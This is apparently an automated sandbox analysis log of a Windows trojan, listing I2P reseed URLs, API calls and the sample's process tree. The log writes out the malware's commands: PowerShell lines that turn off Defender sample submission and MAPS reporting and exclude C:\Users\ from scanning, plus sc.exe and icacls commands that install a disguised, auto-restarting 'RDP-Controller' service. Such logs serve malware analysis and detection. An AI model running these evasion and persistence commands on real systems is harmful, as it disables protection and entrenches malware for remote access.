Source: main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txt2
Source: main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtR
Source: main.exe, 00000017.00000002.2978303418.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531546601.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2531876609.000001FC7B9B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txtp_lib.c
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drString found in binary or memory: http://rus.i2p/hosts.txt
Source: main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.dr, zCUeqzwC.23.drString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3
Source: main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drString found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drString found in binary or memory: https://banana.incognet.io/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drString found in binary or memory: https://i2p.ghativega.in/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drString found in binary or memory: https://i2p.mooo.com/netDb/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drString found in binary or memory: https://i2p.novg.net/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drString found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drString found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drString found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drString found in binary or memory: https://netdb.i2p2.no/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drString found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drString found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drString found in binary or memory: https://reseed.diva.exchange/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, vjj4eCBz.23.drString found in binary or memory: https://reseed.i2p-projekt.de/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drString found in binary or memory: https://reseed.i2pgit.org/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drString found in binary or memory: https://reseed.memcpy.io/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drString found in binary or memory: https://reseed.onion.im/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drString found in binary or memory: https://reseed.stormycloud.org/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drString found in binary or memory: https://reseed2.i2p.net/
Source: dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2980573356.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2976455643.000001FC7B12E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2977904707.000001FC7B55D000.00000004.00000020.00020000.00000000.sdmp, zCUeqzwC.23.drString found in binary or memory: https://www2.mk16.de/
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFB929A inet_addr,ntohl,5_2_00007FF73AFB929A
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFB292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,5_2_00007FF73AFB292E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile deleted: C:\Windows\Temp\zFE1sfMY
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02FA53EA0_2_02FA53EA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02F94B4E0_2_02F94B4E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02F95B420_2_02F95B42
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02F960D20_2_02F960D2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02FA701E0_2_02FA701E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02FAD1220_2_02FAD122
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02F97F320_2_02F97F32
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02F99CFA0_2_02F99CFA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02F9CDAA0_2_02F9CDAA
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFBE4E05_2_00007FF73AFBE4E0
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFBDE8A5_2_00007FF73AFBDE8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF6EF65C44023_2_00007FF6EF65C440
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF6EF661AB023_2_00007FF6EF661AB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E14088023_2_00007FFE0E140880
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1724D023_2_00007FFE0E1724D0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0EB4EF6023_2_00007FFE0EB4EF60
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11ECEAA023_2_00007FFE11ECEAA0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE126D8F0E23_2_00007FFE126D8F0E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE126D8FFC23_2_00007FFE126D8FFC
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE126E048023_2_00007FFE126E0480
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE126D8CDB23_2_00007FFE126D8CDB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE126D8DC623_2_00007FFE126D8DC6
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1338CB1023_2_00007FFE1338CB10
Source: C:\Windows\System32\icacls.exeProcess token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: String function: 00007FF73AFB14E2 appears 295 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE0E16C852 appears 526 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE0EB49DC2 appears 405 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF6EF652EF2 appears 314 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE0E1340D2 appears 473 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE13382072 appears 356 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE11EC1352 appears 398 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FFE126D77A2 appears 388 times
Source: evtsrv.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: TLN3Eh0f.23.drStatic PE information: Number of sections : 11 > 10
Source: zCUeqzwC.23.drStatic PE information: Number of sections : 11 > 10
Source: Jcf8nu5c.23.drStatic PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: zFE1sfMY.23.drStatic PE information: Number of sections : 11 > 10
Source: cnccli.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: DYoNFfUY.23.drStatic PE information: Number of sections : 11 > 10
Source: j8fz8FfX.23.drStatic PE information: Number of sections : 11 > 10
Source: prgmgr.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: file.exeStatic PE information: Number of sections : 11 > 10
Source: libi2p.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: kInii6kX.23.drStatic PE information: Number of sections : 11 > 10
Source: samctl.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: termsrv32.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: rdpctl.dll.23.drStatic PE information: Number of sections : 11 > 10
Source: 9qaNW6z6.23.drStatic PE information: Number of sections : 11 > 10
Source: file.exe, 00000000.00000002.1731999291.0000000002D5A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs file.exe
Source: file.exe, 00000000.00000000.1728129263.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLAPLINK.EXE: vs file.exe
Source: file.exeBinary or memory string: OriginalFilenameLAPLINK.EXE: vs file.exe
Source: classification engineClassification label: mal96.troj.evad.winEXE@38/136@0/58
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFB855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle,5_2_00007FF73AFB855D
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFB1A19 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError,5_2_00007FF73AFB1A19
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF6EF651DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,23_2_00007FF6EF651DBC
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF6EF651DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,23_2_00007FF6EF651DBC
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2140:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2208:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4284:120:WilError_03
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.batJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat"
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeFile read: C:\Users\user\AppData\Local\Temp\wfpblk.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe "C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe "C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe"
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\tskowkhh962esyo3x0.bat"Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe "C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe "C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-ControllerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignoreJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-ControllerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.aclJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
